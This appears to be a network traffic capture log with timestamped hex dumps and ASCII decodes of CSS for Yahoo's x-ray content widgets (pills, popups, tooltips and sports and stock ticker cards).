                                                                                                                                                                        2023-06-02 11:13:21 UTC145INData Raw: 66 61 75 6c 74 2f 74 6f 6d 61 74 6f 49 63 6f 6e 5f 5f 31 5f 2e 73 76 67 29 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 77 69 64 74 68 3a 31 31 70 78 7d 2e 78 72 61 79 2d 6d 6f 76 69 65 2d 65 6e 74 69 74 69 65 73 2d 72 65 76 69 65 77 2d 69 6d 61 67 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 32 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 20 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 33 7d 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e
                                                                                                                                                                        Data Ascii: fault/tomatoIcon__1_.svg);height:12px;width:11px}.xray-movie-entities-review-image{display:inline-block;margin-right:3px;position:relative;top:2px}.caas-xray-entity .caas-xray-entity-follow-button{margin-left:12px;position:relative;z-index:3}.caas-xray-en
                                                                                                                                                                        2023-06-02 11:13:21 UTC146INData Raw: 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 2d 77 66 2d 63 6f 6e 74 61 69 6e 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 20 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 2e 77 61 66 65 72 2d 66 65 74 63 68 2d 63 6f 6d 70 6c 65 74 65 20 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 20 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 2e 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 78 72 61
                                                                                                                                                                        Data Ascii: ty-follow-button-wf-container{opacity:1}.caas-xray-entity .caas-xray-entity-follow-button.wafer-fetch-complete .caas-xray-entity-follow-button-placeholder{opacity:0}.caas-xray-entity .caas-xray-entity-follow-button.wafer-fetch-error{display:none}.caas-xra
                                                                                                                                                                        2023-06-02 11:13:21 UTC147INData Raw: 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 64 61 74 65 2d 73 74 72 69 6e 67 2d 61 63 74 69 76 65 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 64 61 74 65 2d 74 69 6d 65 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 6c 69 76 65 2d 73 63 6f 72 65 2d 61 63 74 69 76 65 2d 74 65 61 6d 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 6c 69 76 65 2d 73 63 6f
                                                                                                                                                                        Data Ascii: orts-subtitle-team-game-date-string-active,.caas-xray-card .xray-card-row-sports-subtitle-team-game-date-time,.caas-xray-card .xray-card-row-sports-subtitle-team-game-live-score-active-team,.caas-xray-card .xray-card-row-sports-subtitle-team-game-live-sco
                                                                                                                                                                        2023-06-02 11:13:21 UTC149INData Raw: 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 64 61 74 65 2d 74 69 6d 65 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 6c 69 76 65 2d 73 63 6f 72 65 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d 6f 70 70 6f 6e 65 6e 74 2c 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 2d
                                                                                                                                                                        Data Ascii: as-xray-card .xray-card-row-sports-subtitle-team-game-date-time,.caas-xray-card .xray-card-row-sports-subtitle-team-game-live-score,.caas-xray-card .xray-card-row-sports-subtitle-team-game-opponent,.caas-xray-card .xray-card-row-sports-subtitle-team-game-
                                                                                                                                                                        2023-06-02 11:13:21 UTC150INData Raw: 75 62 74 69 74 6c 65 2d 74 65 61 6d 2d 67 61 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 73 74 61 74 75 73 2d 6f 76 65 72 76 69 65 77 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2d 6f 76 65 72 76 69 65 77 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 70 6f 72 74 73 2d 73 75 62 74 69 74 6c 65 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f
                                                                                                                                                                        Data Ascii: ubtitle-team-game{display:none}.caas-xray-card .xray-card-row-sports-subtitle.xray-card-row-sports-subtitle-status-overview .xray-card-row-sports-subtitle-overview{align-items:center;display:flex}.caas-xray-card .xray-card-row-sports-subtitle.xray-card-ro
                                                                                                                                                                        2023-06-02 11:13:21 UTC151INData Raw: 72 5f 77 61 74 63 68 6c 69 73 74 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 75 62 74 69 74 6c 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2d 74 79 70 65 2d 74 69 63 6b 65 72 5f 77 61 74 63 68 6c 69 73 74 20 2e 78 72 61 79 2d 63 61 72 64 2d 74 69 63 6b 65 72 2d 77 61 74 63 68 6c 69 73 74 2d 66 6f 6c 6c 6f 77 65 72 2d 63 6f 75 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2d 74 79 70 65 2d 74 69 63 6b 65 72 5f 77 61 74 63 68 6c 69
                                                                                                                                                                        Data Ascii: r_watchlist .xray-card-row-subtitle{align-items:center;display:flex}.caas-xray-card.caas-xray-card-type-ticker_watchlist .xray-card-ticker-watchlist-follower-count-container{display:inline-block;padding:0}.caas-xray-card.caas-xray-card-type-ticker_watchli
                                                                                                                                                                        2023-06-02 11:13:21 UTC152INData Raw: 77 2d 70 65 72 63 65 6e 74 2d 63 68 61 6e 67 65 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 36 30 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f 6f 70 2d 63 61 72 64 2d 63 6f 6e 74 65 6e 74 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f 6f 70 2d 63 61 72 64 2d 63 6f 6c 75 6d 6e 20 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 66 6f 6c 6c 6f 77 2d 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f 6f 70 2d 63 61 72 64 2d 63 6f 6e 74 65 6e 74 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f
                                                                                                                                                                        Data Ascii: w-percent-change .xray-fin-streamer{justify-content:flex-start;min-width:60px}.caas-xray-card .xray-hyperloop-card-content .xray-hyperloop-card-column .caas-xray-entity-follow-button{margin-left:0}.caas-xray-card .xray-hyperloop-card-content .xray-hyperlo
                                                                                                                                                                        2023-06-02 11:13:21 UTC154INData Raw: 2d 61 63 74 69 76 65 29 20 2e 78 72 61 79 2d 65 6e 74 69 74 79 2d 74 69 74 6c 65 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 37 65 31 66 66 66 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f 6f 70 2d 63 61 72 64 2d 63 6f 6e 74 65 6e 74 20 2e 78 72 61 79 2d 68 79 70 65 72 6c 6f 6f 70 2d 79 66 70 2d 77 66 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 34 65 39 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 59 61
                                                                                                                                                                        Data Ascii: -active) .xray-entity-title-link{color:#7e1fff}.caas[data-device=smartphone] .xray-hyperloop-card-content .xray-hyperloop-yfp-wf-container{border-left:1px solid #e0e4e9;margin-left:16px;padding-left:16px}.caas-xray-entity .xray-fin-streamer{font-family:Ya
                                                                                                                                                                        2023-06-02 11:13:21 UTC155INData Raw: 72 65 61 6d 65 72 2d 64 69 73 61 62 6c 65 2d 63 6f 6c 6f 72 73 2d 62 79 2d 64 65 66 61 75 6c 74 29 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 2d 70 65 72 63 65 6e 74 2d 63 68 61 6e 67 65 2d 70 6f 73 69 74 69 76 65 20 73 70 61 6e 2c 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 61 63 74 69 76 65 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 2d 70 65 72 63 65 6e 74 2d 63 68 61 6e 67 65 2d 70 6f 73 69 74 69 76 65 2c 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2e 63 61 61 73 2d 78 72 61 79 2d 65 6e 74 69 74 79 2d 61 63 74 69 76 65 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 2e 78 72 61 79 2d 66 69 6e 2d 73
                                                                                                                                                                        Data Ascii: reamer-disable-colors-by-default).xray-fin-streamer-percent-change-positive span,.caas-xray-entity.caas-xray-entity-active .xray-fin-streamer.xray-fin-streamer-percent-change-positive,.caas-xray-entity.caas-xray-entity-active .xray-fin-streamer.xray-fin-s
                                                                                                                                                                        2023-06-02 11:13:21 UTC156INData Raw: 3b 77 69 64 74 68 3a 32 32 30 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 64 6f 6e 65 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 74 6f 6f 6c 74 69 70 2d 61 72 72 6f 77 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 66 36 39 66 66 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 37 70 78 20 37 70 78 20 30 3b 62 6f 74 74 6f 6d 3a 2d 36 70 78 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 32 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 30 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70
                                                                                                                                                                        Data Ascii: ;width:220px}.caas-xray-wrapper .wafer-tooltip-done .wafer-tooltip-wrapper .xray-tooltip-arrow{border-color:#0f69ff transparent transparent;border-style:solid;border-width:7px 7px 0;bottom:-6px;height:0;left:20px;position:absolute;width:0}.caas-xray-wrapp
                                                                                                                                                                        2023-06-02 11:13:21 UTC158INData Raw: 79 70 65 2d 70 69 6c 6c 73 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 64 6f 6e 65 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 74 6f 6f 6c 74 69 70 2d 61 72 72 6f 77 2c 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 64 6f 6e 65 20 2e 77 61 66 65 72 2d 74 6f 6f 6c 74 69 70 2d 77 72 61 70 70 65 72 7b 6c 65 66 74 3a 32 30 70 78 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2d 74 79 70 65 2d 63 61 72 64 73 20 2e 77
                                                                                                                                                                        Data Ascii: ype-pills .wafer-tooltip-done .wafer-tooltip-wrapper .xray-tooltip-arrow,.caas[data-device=smartphone] .caas-xray-wrapper .wafer-tooltip-done .wafer-tooltip-wrapper{left:20px}.caas[data-device=smartphone] .caas-xray-wrapper.caas-xray-wrapper-type-cards .w
                                                                                                                                                                        2023-06-02 11:13:21 UTC159INData Raw: 6f 72 65 2d 70 72 6f 6d 70 74 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 23 66 66 66 2c 23 66 66 66 20 34 33 25 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 39 29 29 3b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 31 30 35 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 6f 70 75 70 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 76 69 65 77 2d 6d 6f 72 65 2d 70 72 6f 6d 70 74 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 39 29 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25
                                                                                                                                                                        Data Ascii: ore-prompt:before{background-image:linear-gradient(0deg,#fff,#fff 43%,hsla(0,0%,100%,.9));bottom:0;height:105px}.caas-xray-popup .xray-popup-wrapper .xray-popup-view-more-prompt:after{background-image:linear-gradient(0deg,hsla(0,0%,100%,.9),hsla(0,0%,100%
                                                                                                                                                                        2023-06-02 11:13:21 UTC160INData Raw: 78 72 61 79 2d 70 6f 70 75 70 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 77 72 61 70 70 65 72 3a 68 6f 76 65 72 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 63 6f 6e 74 65 6e 74 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 37 63 64 64 32 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 6f 70 75 70 20 2e 78 72 61 79 2d 63 61 72 64 2d 6c 6f 61 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 64 65 66 61 75 6c 74 2f 32 30 32 30 31 30 32 37 2f 33 63 32 38 35 66 33 63 2d 31 61 66 62 2d 34 66 32 34 2d 39 38 32 66 2d 37 65 64 65 62 65 65 39 61 33 36 65 2e 67 69 66 29 3b 62 61 63 6b 67
                                                                                                                                                                        Data Ascii: xray-popup .xray-popup-wrapper:hover .xray-popup-content::-webkit-scrollbar-thumb{background-color:#c7cdd2}.caas-xray-popup .xray-card-loader{background-image:url(https://s.yimg.com/cv/apiv2/default/20201027/3c285f3c-1afb-4f24-982f-7edebee9a36e.gif);backg
                                                                                                                                                                        2023-06-02 11:13:21 UTC161INData Raw: 70 6f 70 75 70 20 2e 78 72 61 79 2d 63 61 72 64 2d 6c 6f 61 64 65 72 7b 62 6f 74 74 6f 6d 3a 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 6f 70 75 70 20 2e 78 72 61 79 2d 65 72 72 6f 72 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6c 65 66 74 3a 35 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 6f 70 75 70 20 2e 78 72 61 79 2d 65 72 72 6f 72 2d 77 72 61 70 70 65 72
                                                                                                                                                                        Data Ascii: popup .xray-card-loader{bottom:0;display:none;left:0;position:absolute;right:0;top:0}.caas-xray-popup .xray-error-wrapper{display:none;left:50%;position:absolute;text-align:center;top:50%;transform:translate(-50%,-50%)}.caas-xray-popup .xray-error-wrapper
                                                                                                                                                                        2023-06-02 11:13:21 UTC163INData Raw: 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 2e 68 61 73 2d 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 61 63 74 69 76 65 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 76 69 65 77 2d 6d 6f 72 65 2d 70 72 6f 6d 70 74 2c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 2e 77 61 66 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 2d 69 6e 70 72 6f 67 72 65 73 73 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 61 63 74 69 76 65 20 2e 78 72 61 79 2d 70 6f 70 75 70 2d 76 69 65 77 2d 6d 6f 72 65 2d 70 72 6f 6d 70 74 7b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 63 61
                                                                                                                                                                        Data Ascii: tent{display:none}.caas-xray-pills-container.has-wafer-fetch-error .xray-popup-active .xray-popup-view-more-prompt,.caas-xray-pills-container.wafer-fetch-boundary-inprogress .xray-popup-active .xray-popup-view-more-prompt{opacity:0;pointer-events:none}.ca
                                                                                                                                                                        2023-06-02 11:13:21 UTC164INData Raw: 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 66 65 74 63 68 2d 74 72 69 67 67 65 72 2c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 77 72 61 70 70 65 72 2e 68 69 64 65 7b 64 69 73
                                                                                                                                                                        Data Ascii: ;white-space:nowrap}.caas-xray-pills .xray-pill-wrapper{display:inline-flex;font-size:1em;line-height:normal;margin:0;position:relative;vertical-align:top}.caas-xray-pills .xray-pill-wrapper .xray-fetch-trigger,.caas-xray-pills .xray-pill-wrapper.hide{dis
                                                                                                                                                                        2023-06-02 11:13:21 UTC165INData Raw: 6d 61 72 67 69 6e 3a 2d 31 36 70 78 20 31 30 25 20 34 70 78 20 2d 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2d 74 79 70 65 2d 63 61 72 64 73 20 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 2d 6c 69 73 74 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2d 74 79 70 65 2d 63 61 72 64 73 20 2e 63 61 61 73 2d 78 72 61 79
                                                                                                                                                                        Data Ascii: margin:-16px 10% 4px -10px;padding-bottom:16px;padding-left:10px;padding-top:16px}.caas-xray-wrapper.caas-xray-wrapper-type-cards .caas-xray-pills-list-wrapper .xray-pill-wrapper{margin-right:12px}.caas-xray-wrapper.caas-xray-wrapper-type-cards .caas-xray
                                                                                                                                                                        2023-06-02 11:13:21 UTC165INData Raw: 72 61 70 70 65 72 20 2e 78 72 61 79 2d 63 61 72 64 73 2d 67 72 61 64 69 65 6e 74 2d 6d 61 73 6b 7b 62 6f 74 74 6f 6d 3a 30 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 38 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 77 69 64 74 68 3a 38 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61 70 70 65 72 2d 74 79 70 65 2d 63 61 72 64 73 20 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 73 2d 6c 69 73 74 2d 77 72 61 70 70 65 72 20 2e 78 72 61 79 2d 63 61 72 64 73 2d
                                                                                                                                                                        Data Ascii: rapper .xray-cards-gradient-mask{bottom:0;content:"";opacity:0;pointer-events:none;position:absolute;top:8px;transition:opacity .2s ease-in-out;width:80px;z-index:1}.caas-xray-wrapper.caas-xray-wrapper-type-cards .caas-xray-pills-list-wrapper .xray-cards-
                                                                                                                                                                        2023-06-02 11:13:21 UTC167INData Raw: 28 30 2c 30 2c 30 2c 2e 31 29 2c 30 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 36 70 78 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 33 36 70 78 3b 7a 2d 69 6e 64 65 78 3a 34 7d 2e 63 61 61 73 2d 78 72 61 79 2d 77 72 61
                                                                                                                                                                        Data Ascii: (0,0,0,.1),0 0 1px 0 rgba(0,0,0,.1);cursor:pointer;height:36px;opacity:0;outline:none;padding:6px;pointer-events:none;position:absolute;top:50%;transform:translateY(-50%);transition:all .2s ease-in-out;visibility:hidden;width:36px;z-index:4}.caas-xray-wra
